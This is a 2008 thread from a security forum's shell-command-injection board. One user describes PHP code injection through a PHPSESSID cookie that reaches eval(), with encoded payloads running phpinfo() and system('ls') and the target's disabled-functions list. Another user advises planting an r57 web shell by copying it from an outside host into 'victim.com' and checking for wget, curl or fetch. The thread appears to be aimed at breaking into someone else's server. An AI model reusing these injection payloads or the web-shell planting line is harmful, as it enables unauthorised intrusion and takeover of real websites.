|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 62
Members: 0
Total: 62
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
I need a little help |
|
Posted: Thu May 01, 2008 4:32 am |
|
|
julioisaias |
Valuable expert |
|
|
Joined: Jan 25, 2008 |
Posts: 50 |
|
|
|
|
|
|
|
I need help for this problem.
PHP Execution in cookie
----------------------------
1. Original Cookie:
PHPSESSID=e2123291ddada51f7702819e2604e38b
Result: Normal Page......OK
2. Malicious command in Cookie:
PHPSESSID='%3Bphpinfo%28%29%3Bexit%3B// <--- ';phpinfo();exit;// (encoded)
Result: PHP CONFIGURATION PAGE......OK
3. Other malicious command in cookie:
PHPSESSID='%3Bsystem%28%27ls%27%29%3Bexit%3B// <--- ';system("ls");exit;// (encoded)
Result: Warning: system() has been disabled for security reasons in /home/web/www/config/config.php(241) : eval()'d code on line 1
Some another way?
Best Regards. |
|
_________________ I study enough to make the rest a result. |
|
|
|
Posted: Thu May 01, 2008 5:03 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Look in phpinfo.
Safe Mode is ON?
mod_security is installed?
disabled functions? |
|
|
|
|
Posted: Thu May 01, 2008 5:39 am |
|
|
julioisaias |
Valuable expert |
|
|
Joined: Jan 25, 2008 |
Posts: 50 |
|
|
|
|
|
|
|
Thanks Koko.
safe_mode = Off
register_globals=Off
allow_url_fopen=On
allow_url_include=On
Disable functions= dl, exec, passthru, popen, proc_open, proc_close, shell_exec, system, posix_getgrgid, posix_getgrnam, posix_getpwname, posix_getpwuid, posix_kill, syslog,
file_uploads=On
magic_quotes_gpc=Off
magic_quotes_runtime=Off
magic_quotes_sybase=Off
Is it a possible SQL Injection?
Best Regards. |
|
_________________ I study enough to make the rest a result. |
|
|
|
Posted: Thu May 01, 2008 8:14 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
If you have r57 web shell upload in some where.Next
@copy('http://yoursite.com/r57.txt','/full/path/to/victim.com/shell.php');
In r57 use eval() function to read files. |
|
|
|
|
Posted: Thu May 01, 2008 9:10 am |
|
|
julioisaias |
Valuable expert |
|
|
Joined: Jan 25, 2008 |
Posts: 50 |
|
|
|
|
|
|
|
Thank you for your help, but I believe that I had bad luck.
Warning: copy(/home/web/www/shell.php) [function.copy]: failed to open stream: Permission denied in /home/web/www/config/config.php(241) : eval()'d code on line 1
Permission denied....
Can it be possible?
Best Regards. |
|
_________________ I study enough to make the rest a result. |
|
|
|
Posted: Thu May 01, 2008 9:47 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
OK.
run command which wget curl fetch |
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|